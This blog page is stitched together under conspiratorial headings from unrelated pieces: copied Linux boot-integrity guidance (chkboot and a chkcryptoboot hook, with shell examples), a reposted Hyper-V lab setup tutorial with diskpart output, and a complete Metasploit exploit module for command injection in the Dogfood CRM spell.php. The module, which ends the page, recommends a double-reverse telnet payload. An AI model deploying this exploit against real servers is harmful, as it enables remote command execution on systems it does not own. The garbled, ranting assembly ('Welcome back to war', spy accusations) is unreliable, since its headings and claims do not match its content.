Thursday, August 31, 2017

oh please...who want to read Black Hat Mossad...? PART II ANGELFIRE NSA

chkboot

Warning: chkboot makes a /boot partition tamper-evident, not tamper-proof. By the time the chkboot script is run, you have already typed your password into a potentially compromised boot loader, kernel, or initrd. If your system fails the chkboot integrity test, no assumptions can be made about the security of your data.
Based on an article in c't magazine (Issue 3/12, page 146, 01.16.2012, [3]), the following script checks the files under /boot for changes in their SHA-1 hash, inode number, and the blocks they occupy on disk. It also checks the Master Boot Record. The script cannot prevent certain types of attack, but it makes many of them harder to carry out unnoticed. No configuration of the script itself is stored in the unencrypted /boot. With a locked or powered-off encrypted system, this makes life harder for some attackers because it is not apparent that an automatic checksum comparison of the partition is done upon boot. However, an attacker who anticipates these precautions can manipulate the firmware to run his own code underneath your kernel and intercept file system access, e.g. to /boot, and present the untampered files. In general, no security measure below the level of the firmware can guarantee trust or tamper evidence.
The script with installation instructions is available from its author (Juergen Schmidt, ju at heisec.de; License: GPLv2). There is also a chkboot package in the AUR.
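To make concrete what "hash, inode and occupied blocks per file, plus the MBR" looks like in practice, here is an added example; it is not the chkboot script and is not code from the page. It records a baseline for every regular file under a directory (SHA-256 here rather than the SHA-1 the article used, plus inode number and allocated block count from stat) together with the hash of the first 512 bytes of a device or image file you name, and on a later run reports which entries differ. The directory, device and baseline paths are placeholders you supply; it assumes GNU coreutils (stat --printf, sha256sum) and does not handle file names that contain newlines.

```shell
#!/bin/sh
# Added example modelled on chkboot's idea (not chkboot itself):
# per-file hash + inode + block count, plus a hash of the boot sector.
# Needs GNU coreutils (stat --printf, sha256sum); file names with
# embedded newlines are not supported.

# One line per regular file under $1: hash<TAB>inode<TAB>blocks<TAB>path
snapshot_tree() {
    local dir="$1" f
    find "$dir" -type f | LC_ALL=C sort | while IFS= read -r f; do
        printf '%s\t%s\t%s\n' "$(sha256sum "$f" | cut -d' ' -f1)" \
            "$(stat --printf '%i\t%b' "$f")" "$f"
    done
}

# Hash of the first 512 bytes (MBR / boot sector) of a device or image file
snapshot_mbr() {
    dd if="$1" bs=512 count=1 2>/dev/null | sha256sum | cut -d' ' -f1
}

# Write the baseline for directory $1 (and boot sector $2, may be empty) to $3.
# Keep $3 on the encrypted root, never under /boot.
save_baseline() {
    local dir="$1" mbr="$2" out="$3"
    {
        if [ -n "$mbr" ]; then printf 'MBR\t%s\n' "$(snapshot_mbr "$mbr")"; fi
        snapshot_tree "$dir"
    } > "$out"
}

# Print the paths (or "MBR") whose record differs between two baseline files.
# sort + uniq -u keeps only lines that occur in exactly one of the files.
changed_entries() {
    LC_ALL=C sort "$1" "$2" | uniq -u \
        | awk -F'\t' '{ if ($1 == "MBR") print "MBR"; else print $4 }' \
        | LC_ALL=C sort -u
}

# Re-snapshot $1/$2 and compare with baseline $3; returns 1 on any change
verify_baseline() {
    local dir="$1" mbr="$2" base="$3" cur changes
    cur=$(mktemp)
    save_baseline "$dir" "$mbr" "$cur"
    changes=$(changed_entries "$base" "$cur")
    rm -f "$cur"
    if [ -n "$changes" ]; then
        echo "WARNING: the following entries differ from the baseline:" >&2
        printf '%s\n' "$changes" | sed 's/^/  /' >&2
        return 1
    fi
    echo "OK: $dir and boot sector match the baseline"
    return 0
}

# Typical use (placeholders): save once from a known-good state, verify at boot
#   save_baseline /boot /dev/sda /root/.boot-baseline
#   verify_baseline /boot /dev/sda /root/.boot-baseline
```

A kernel update legitimately changes the files under /boot, so the baseline has to be refreshed after every such update, which is exactly why the page's pacman wrapper below runs the check before and after pacman -Syu.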
After installation add a service file (the package includes one based on the following) and enable it:
[Unit]
Description=Check that boot is what we want
Requires=basic.target
After=basic.target

[Service]
Type=oneshot
ExecStart=/usr/local/bin/chkboot.sh

[Install]
WantedBy=multi-user.target
There is a small caveat for systemd. At the time of writing, the original chkboot.sh script provided contains an empty space at the beginning of #!/bin/bash which has to be removed for the service to start successfully.
As /usr/local/bin/chkboot_user.sh needs to be executed right after login, you need to add it to the autostart (e.g. under KDE -> System Settings -> Startup and Shutdown -> Autostart; GNOME 3: gnome-session-properties).
With Arch Linux, changes to /boot are pretty frequent, for example when new kernels roll in. Therefore it may be helpful to run the scripts with every full system update. One way to do so:
#!/bin/bash
#
# Note: set CHKBOOT_USER to your login name (placeholder below) and run this
# script with sudo so that pacman and chkboot work automagically
#
CHKBOOT_USER="<your-username>"   # placeholder: the logged-on user that runs chkboot_user.sh

echo "Pacman update [1] Quickcheck before updating"
sudo -u "$CHKBOOT_USER" /usr/local/bin/chkboot_user.sh
/usr/local/bin/chkboot.sh
sync       # flush the check results to disk
sudo -u "$CHKBOOT_USER" /usr/local/bin/chkboot_user.sh
echo "Pacman update [2] Syncing repos for pacman"
pacman -Syu
/usr/local/bin/chkboot.sh
sync
sudo -u "$CHKBOOT_USER" /usr/local/bin/chkboot_user.sh
echo "Pacman update [3] All done, let us roll on ..."

mkinitcpio-chkcryptoboot

Warning: This hook does not encrypt GRUB's core (MBR) code or EFI stub, nor does it protect against situations where an attacker is able to modify the behaviour of the bootloader to compromise the kernel and/or initramfs at run-time.
mkinitcpio-chkcryptoboot (AUR) is a mkinitcpio hook that performs integrity checks during early userspace and advises the user not to enter his root partition password if the system appears to have been compromised. Security is achieved through an encrypted boot partition, which is unlocked using GRUB's cryptodisk.mod module, and a root filesystem partition, which is encrypted with a password different from the former. This way, the initramfs and kernel are secured against offline tampering, and the root partition can remain secure even if the /boot partition password is entered on a compromised machine (provided that the chkcryptoboot hook detects the compromise, and is not itself compromised at run-time).
This hook requires grub release >=2.00 to function, and a dedicated, LUKS-encrypted /boot partition with its own password in order to be secure.

Installation

Install mkinitcpio-chkcryptoboot (AUR) and edit /etc/default/chkcryptoboot.conf. If you want to be able to detect whether your boot partition was bypassed, edit the CMDLINE_NAME and CMDLINE_VALUE variables with values known only to you. You can follow the advice of using two hashes, as suggested right after the installation. Also be sure to make the matching change to the kernel command line in /etc/default/grub. Edit the HOOKS= line in /etc/mkinitcpio.conf and insert the chkcryptoboot hook before encrypt. When finished, rebuild the initramfs.
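The CMDLINE_NAME/CMDLINE_VALUE setting boils down to this: the GRUB configuration on the encrypted /boot appends a parameter only you know to the kernel command line, so an initramfs that was started by some other path (a replaced bootloader, a kernel booted from elsewhere) will not carry it, and the hook can refuse to proceed quietly. The following added example models that test in shell; it is not the hook's code, the hook's exact logic is not on the page, and the mechanism is stated here as an assumption. The parameter name and values are constructed.

```shell
#!/bin/sh
# Added example of a "was my encrypted /boot bypassed?" marker check,
# modelled on (not copied from) mkinitcpio-chkcryptoboot's CMDLINE_NAME /
# CMDLINE_VALUE setting. Mechanism assumed: a secret key=value parameter
# is placed on the kernel command line by the GRUB config that lives on
# the encrypted /boot; its absence or a wrong value is a red flag.

# Print the value of kernel parameter $2 in command line string $1.
# Returns 1 when the parameter is absent. Splits on whitespace like the
# kernel does for simple parameters; values themselves may contain '='.
cmdline_param() {
    local cmdline="$1" name="$2" tok
    for tok in $cmdline; do
        case "$tok" in
            "$name="*) printf '%s\n' "${tok#*=}"; return 0 ;;
        esac
    done
    return 1
}

# Succeed only when marker $2 is present in $1 with the expected value $3.
# Messages go to stderr so the early-userspace console shows them.
check_boot_marker() {
    local cmdline="$1" name="$2" expected="$3" actual
    if ! actual=$(cmdline_param "$cmdline" "$name"); then
        echo "WARNING: marker '$name' missing from the kernel command line;" \
             "the encrypted /boot may have been bypassed" >&2
        return 1
    fi
    if [ "$actual" != "$expected" ]; then
        echo "WARNING: marker '$name' present but its value differs from" \
             "the expected one; do not enter the root passphrase" >&2
        return 1
    fi
    return 0
}

# Typical use inside an initramfs hook (placeholder name/value):
#   check_boot_marker "$(cat /proc/cmdline)" "b7c1d2" "9f3e8a1c"
```

Using two hashes, as the post-install message suggests, just makes the name and value look like noise among the other parameters; what matters is that both live only in the GRUB config on the encrypted /boot and in the hook's config on the encrypted root.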

oh please...who want to read Black Hat lol Mossad..? PART 1

Setting up your Hacking Playground - Hyper-V Quick Setup [Part 2]

By Tony Lee.

In the first part of this series, we did a high-level comparison between the free versions of VMWare ESXi and Microsoft's Hyper-V. In this part, we will explore the insane (and absurd) challenge that exists when setting up Hyper-V as a remotely managed, headless server. Finally, in the last part of the series, we will give you the essentials needed to start using Hyper-V and present the winner of our Geek Playground comparison.

Hyper-V manager installation

Hyper-V Server 2012 installation was smooth--maybe a little too smooth… There has to be a catch, right? Of course there is! The remote management setup is extremely frustrating and unpolished. In fact, I am a little surprised Microsoft released a product that has so many issues. All I want to do is connect to the server from my laptop and manage the VMs! Fortunately, since I had to struggle through the setup, I figured I would document the process to hopefully save you some sleepless nights.

Here comes the ugly so hold on to your knickers!

Downloading and installing the client

Windows 7 Hyper-V Manager can be downloaded as part of the Remote Server Administration Tools for Windows 7.

Caveat: "Remote Server Administration Tools for Windows 7 with SP1 can be installed ONLY on computers that are running the Enterprise, Professional, or Ultimate editions of Windows 7 or Windows 7 with SP1." -- So no Home Edition… Sorry folks.

Ironically, the Remote Server Administration Tools (RSAT) client took longer to install than the Hyper-V server. Crazy!

Enabling Hyper-V tools

After install, if you are like me, you are wondering why you cannot locate Hyper-V Manager in the start menu. Then it dawns on you that you have to enable that as a Windows feature shown in the screenshot below:



Microsoft’s obfuscation skills increase by 10

Enabling Remote Management

Whew! So, all is good, right? We can open the Hyper-V Manager client and click "Connect to Server"… But when we enter the IP of the remote server we get an error message:

“An error occurred while attempting to connect to server [HOSTNAME]. Check that the Virtual Machine Management service is running and that you are authorized to connect to the server. You do not have the required permission to complete this task. Contact the administrator of the authorization policy for the computer [HOSTNAME].”

Huh?



After Googling around, I found a series of posts by John Howard, a Senior Program Manager in the Hyper-V team. This series of posts included a very detailed, but lengthy, explanation on how to fix this issue. Not placing fault on John here, but in my opinion, maybe Microsoft should just fix the issue? It is hard to imagine that the product would be released with this frustrating limitation. When using VMWare vSphere client, you just enter the IP/Hostname and some credentials--what is so difficult about that?

Fortunately, John Howard was nice enough to also create a tool to do all of this configuration magic for us, the "Hyper-V Remote Management Configuration Utility". However, this is not just any tool, I was amazed to see that it is a 6,300 line VB script! John must be a wizard or something. :)

Hyper-V Remote Management Configuration Utility

Download from:


Copy the hvremote.wsf script to the server - From the server, map the C drive of your client laptop:

 net use * \\laptop\C$ "password" /U:local\[user]

copy z:\users\[user]\Desktop\hvremote.wsf c:\




Setting up Accounts

Since my laptop was already a member of a domain and the server is a member of a workgroup, I used the provided “10 second guide” instructions:

Server Side

Add user syntax:
 net user [username] "[password]" /add

ex:
net user tony "SecretPassword" /add




Grant user access syntax:
 cscript hvremote.wsf /add:[username]

ex:
cscript hvremote.wsf /add:tony




Client Side

 cmdkey /add:[servername] /user:[servername]\[accountname] /pass

ex:
cmdkey /add:VMServer /user:VMServer\tony /pass




Enabling Ping on Hyper-V

On your Hyper-V host, in the blue configuration command prompt (sconfig.cmd):

Select #4: Configure Remote Management -> #3 Configure Server Response to Ping

Add the server name to the client's hosts file

From an elevated command prompt on the client (Start -> cmd -> right click -> Run as Administrator), open the hosts file (the write command launches WordPad) and add a line:

 write c:\windows\system32\drivers\etc\hosts
[IP address]  [Hostname]

ex:
192.168.2.130   VMServer




Reboot server!

Verify proper functionality

Run the following command on both computers:

 cscript hvremote.wsf /show /target:othercomputername

ex from laptop:
cscript hvremote.wsf /show /target:VMServer

ex from server:
cscript hvremote.wsf /show /target:laptop




You should now be able to bring up Hyper-V Manager and connect to the server



Disk management

Now that we can access the Hyper-V server through Hyper-V Manager, we may need to make our extra disk drives in the server usable. Most people point and click via the GUI, but you can also manage the disks via the command line interface as well. CLI knowledge is critical for the free version of Hyper-V.

To list the logical drive letters, we can use:

 wmic logicaldisk get name,description
Description       Name
Local Fixed Disk  C:
CD-ROM Disc       D:
CD-ROM Disc       E:




We have two extra hard drives (2x2TB) that do not show up as usable. We will fix that with Diskpart.

Diskpart foo

 C:\Users\Administrator>diskpart

Microsoft DiskPart version 6.2.9200

Copyright (C) 1999-2012 Microsoft Corporation.
On computer: VMSERVER

DISKPART> list letter

Microsoft DiskPart version 6.2.9200

DISK        - Display a list of disks. For example, LIST DISK.
PARTITION   - Display a list of partitions on the selected disk.
              For example, LIST PARTITION.
VOLUME      - Display a list of volumes. For example, LIST VOLUME.
VDISK       - Displays a list of virtual disks.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     D                       DVD-ROM         0 B  No Media
  Volume 1     E                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 3                      NTFS   Partition   1862 GB  Healthy
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot




So, we have confirmed that my two DVD burners are D and E… I wanted to change that to F and G and then assign drive letters D and E to my other hard drives.

 DISKPART> select volume 0

Volume 0 is the selected volume.

DISKPART> assign letter=F

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
* Volume 0     F                       DVD-ROM         0 B  No Media
  Volume 1     E                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot





Now, for the other one:
 DISKPART> select volume 1

Volume 1 is the selected volume.

DISKPART> assign letter=G

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     F                       DVD-ROM         0 B  No Media
* Volume 1     G                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot




Now, to partition, format and assign drive letters to the other disks:
 DISKPART> list disk

  Disk ###  Status         Size     Free     Dyn  Gpt
  --------  -------------  -------  -------  ---  ---
  Disk 0    Online         1863 GB  1862 GB
  Disk 1    Online         1863 GB  1863 GB        *
* Disk 2    Online          167 GB      0 B

DISKPART> select disk 0

Disk 0 is now the selected disk.

DISKPART> list partition

  Partition ###  Type              Size     Offset
  -------------  ----------------  -------  -------
  Partition 1    Primary            350 MB  1024 KB

DISKPART> create partition primary

DiskPart succeeded in creating the specified partition.

DISKPART> list partition

  Partition ###  Type              Size     Offset
  -------------  ----------------  -------  -------
  Partition 1    Primary            350 MB  1024 KB
* Partition 2    Primary           1862 GB   351 MB

DISKPART> format fs=ntfs quick

  100 percent completed

DiskPart successfully formatted the volume.

DISKPART> assign letter=D

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     F                       DVD-ROM         0 B  No Media
  Volume 1     G                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
* Volume 3     D                NTFS   Partition   1862 GB  Healthy
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot





Now, for the last drive:

 DISKPART> list disk

  Disk ###  Status         Size     Free     Dyn  Gpt
  --------  -------------  -------  -------  ---  ---
* Disk 0    Online         1863 GB      0 B
  Disk 1    Online         1863 GB  1863 GB        *
  Disk 2    Online          167 GB      0 B

DISKPART> select disk 1

Disk 1 is now the selected disk.

DISKPART> list partition

There are no partitions on this disk to show.

DISKPART> create partition primary

DiskPart succeeded in creating the specified partition.

DISKPART> list partition

  Partition ###  Type              Size     Offset
  -------------  ----------------  -------  -------
* Partition 1    Primary           1863 GB  1024 KB

DISKPART> format fs=ntfs quick

  100 percent completed

DiskPart successfully formatted the volume.

DISKPART> assign letter=E

DiskPart successfully assigned the drive letter or mount point.

DISKPART> list volume

  Volume ###  Ltr  Label        Fs     Type        Size     Status     Info
  ----------  ---  -----------  -----  ----------  -------  ---------  --------
  Volume 0     F                       DVD-ROM         0 B  No Media
  Volume 1     G                       DVD-ROM         0 B  No Media
  Volume 2         System Rese  NTFS   Partition    350 MB  Healthy    System
  Volume 3     D                NTFS   Partition   1862 GB  Healthy
  Volume 4     C                NTFS   Partition    167 GB  Healthy    Boot
* Volume 5     E                NTFS   Partition   1863 GB  Healthy

DISKPART> exit

Leaving DiskPart...

C:\Users\Administrator>e:

E:\>dir
 Volume in drive E has no label.
 Volume Serial Number is 2015-54E4

 Directory of E:\

File Not Found

E:\>d:

D:\>dir
 Volume in drive D has no label.
 Volume Serial Number is 5CC4-3887

 Directory of D:\

File Not Found





Finally! We can use all of the hard drives: 


http://blog.opensecurityresearch.com/2013/04/setting-up-your-hacking-playground_30.html


DOGFOOD NSA RUSSIAN CYBER INTEL ...BACKDOOR

Hi everybody! Welcome back to war! Last night "gazer" no such thing as email phishing ...bullshit! And Cerlet is a spy. Here's the remote app

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking
 
    include Msf::Exploit::Remote::HttpClient
 
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Dogfood CRM spell.php Remote Command Execution',
            'Description'    => %q{
                    This module exploits a previously unpublished vulnerability in the
                Dogfood CRM mail function which is vulnerable to command injection
                in the spell check feature.  Because of character restrictions, this
                exploit works best with the double-reverse telnet payload. This
                vulnerability was discovered by LSO and affects v2.0.10.
            },
            'Author'         =>
                [
                    'LSO ', # Exploit module
                    'patrick', # Added check code, QA tested ok 20090303, there are no references (yet).
                ],
            'License'        => BSD_LICENSE,
            'Version'        => '$Revision: 9669 $',
            'References'     =>
                [
                    [ 'OSVDB', '54707' ],
                    [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],
                ],
            'Privileged'     => false,
            'Platform'       => ['unix'], # patrickw - removed win, linux -> untested
            'Arch'           => ARCH_CMD,
            'Payload'        =>
                {
                    'Space'       => 1024,
                    'DisableNops' => true,
                    'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic perl ruby bash telnet',
                        }
                },
            'Targets'        => [ ['Automatic', { }], ],
            'DefaultTarget'  => 0,
            'DisclosureDate' => 'Mar 03 2009'
            ))
 
        register_options(
            [
                OptString.new('URIPATH',   [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),
            ], self.class)
 
    end
 
    def check
        res = send_request_raw(
            {
                'uri' => datastore['URIPATH'],
            }, 1)
 
        if (res.body =~ /Spell Check complete/)
            return Exploit::CheckCode::Detected
        end
        return Exploit::CheckCode::Safe
    end
 
    def exploit
        timeout = 1
 
        cmd = payload.encoded
        data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"
        uri = datastore['URIPATH']
 
        response = send_request_cgi(
            {
            'uri' => uri,
            'method' => "POST",
            'data' => data
            },
        timeout)
 
        handler
    end
end

Dogfood CRM - spell.php Remote Command Execution (Metasploit). Webapps exploit for PHP platform. Tags: Metasploit Framework
EXPLOIT-DB.COM


